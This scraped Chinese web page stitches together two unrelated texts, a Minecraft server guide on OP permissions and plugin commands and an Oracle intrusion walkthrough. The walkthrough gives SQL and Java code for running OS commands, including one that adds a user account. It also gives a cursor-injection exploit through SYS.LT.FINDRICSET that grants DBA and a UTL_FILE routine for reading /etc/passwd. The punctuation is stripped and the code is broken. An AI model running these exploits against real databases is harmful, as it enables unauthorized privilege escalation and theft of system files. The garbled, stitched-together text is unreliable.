我的世界服务器怎么获得op权限

服务器CMD设置：在开启服务器后有一个CMD指令框，玩家们只要在CMD中输入OP 玩家ID，即可给这名玩家添加OP权限。游戏中添加：游戏中持有OP权限的玩家，可以在对话框中输入/op 玩家ID，来给予其他玩家OP权限。

服务器文件修改：在服务器文件列表中有一个Ops.txt的文件夹，在文件夹中输入需要OP权限的玩家ID保存即可。游戏创始人为马库斯·佩尔松，也称为notch，其灵感源于《无尽矿工》､《矮人要塞》和《地下城守护者》。

玩家可以在游戏中的三维空间里创造和破坏各种各样的方块，甚至在多人服务器与单人世界中体验不同的游戏模式，在高度的自由中，玩家们也自己创作出了大大小小的玩法，打造精美的建筑物，创造物和艺术品。且游戏平台已囊括了移动设备和游戏主机。

spawn传送到主城/register密码#注册账号/login密码#登陆账号/money#查看金钱/psy名字钱数 给予别人金钱/sethome#设置自己的家/home#回到自己设置的家/spawn#传送到出生点/back#回到上一次传送点(例如死后回尸体处) [private]物品上锁把木牌放到箱子前，输入：第一行：[Private]第二行：空第三行：可以用这个箱子的其他人第四行：可以用这个箱子的其他人/getpos#显示坐标/setwarp[warp点]#设置公共传送点/warp[warp点]#传送到指定传送点/tpa<玩家ID>#请求传送到玩家player所在位置/tpahere<玩家ID>#请求玩家player传送到自己所在位置/tpaccept#接受玩家传送的请求/tpdeny#拒绝玩家传送的请求/rescreate[领地名]-选择好区域后创建一个叫做[领地名]的领地/resremove[领地名]-移除一个叫[领地名]的领地/resremoveall-移除所有领地/ressubzone<领地名>[子区域名]-在领地内创建一块子区域，你必须是所有者才行。/resinfo[领地名]-查询领地权限以下为权限设置(true为开启，false为关闭)/resset【领地】【具体权限】true/false将你的领地设定权限是否开启/respset【领地】【玩家名字】【具体权限】true/false将你的领地开放或关闭给某玩家一个具体的权限admin：领地的全权管理权限，仅能给与某玩家container：是否能使用箱子，发射器等bucket：设置是否能使用桶ignite：点火的权限piston：活塞是否能使用build：建造权限(包括destroy和place)destroy：毁坏权限place：放置权限emove：进入权限tp：传送权限use：使用权限(工作台，炉子等)subzone：是否能设置子空间tnt：设置tnt是否有效creeper：设置JJ怪是否有效(设置F的话JJ怪就废了)damage：设置领地内是否能造成伤害(不能防止被挤死)monsters：设置是否刷新怪物animals：设置是否刷新动物firespread：火是否能蔓延flow：液体流动，包括waterflow和lavaflowwaterflow：水的流动lavaflow：岩浆流动healing：设置是否能恢复生命pvp：设置是否能pvp求采纳

很快便连接上oracle服务器 此时发现

连接后不是dba权限

不能利用SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES漏洞提升权限

运行SELECT UTL_HTTP request( ) FROM dual 后发现oracle服务器不能连接网络

幸运的是

运行

create or replace function Linx_Query (p varchar ) return number authid current_user is begin execute immediate preturn end

成功!这个用户具有create proceduce权限

此时马上想到创建java扩展执行命令

create or replace and pile java source named LinxUtil as import java io *public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) )String stemp str= while ((stemp = myReader readLine()) != null) str +=stemp+ myReader close()return str} catch (Exception e){return e toString()}}}

begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <>execute )end

create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String

select * from all_objects where object_name like %LINX%

grant all on LinxRunCMD to public

select LinxRunCMD( cmd /c net user linx /add ) from dual

但是在第一步就卡住了 服务器由于某种未知原因 不能创建java扩展!!

还好 我们还有UTL库可以利用

create or replace function LinxUTLReadfile (filename varchar ) return varchar is

fHandler UTL_FILE FILE_TYPE

buf varchar ( )

output varchar ( )

BEGIN

fHandler := UTL_FILE FOPEN( UTL_FILE_DIR filename r )

loop

begin

utl_file get_line(fHandler buf)

DBMS_OUTPUT PUT_LINE( Cursor: ||buf)

exception

when no_data_found then exit

end

output := output||buf||chr( )

end loop

UTL_FILE FCLOSE(fHandler)

return output

END

UTL_FILE_DIR需要先用

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc

指定目 但运行后发现没有权限 只好想办法提权

***************游标注射***************

老外写了N个pdf介绍这技术 我精简了代码

DECLARE

MYC NUMBER

BEGIN

MYC := DBMS_SQL OPEN_CURSOR

DBMS_SQL PARSE(MYC declare pragma autonomous_transactionbegin execute immediate GRANT DBA TO linxlinx_current_db_user mitend)

DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

BEGIN SYS LT FINDRICSET( ||dbms_sql execute( ||MYC|| )|| )– x )END

raise NO_DATA_FOUND

EXCEPTION

WHEN NO_DATA_FOUND THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

WHEN OTHERS THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

END

运行后重新连接就有dba权限了 简单吧……

现在可以读取文件了

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc

select LinxUTLReadfile( passwd ) from dual

lishixinzhi/Article/program/Oracle/201311/16747

---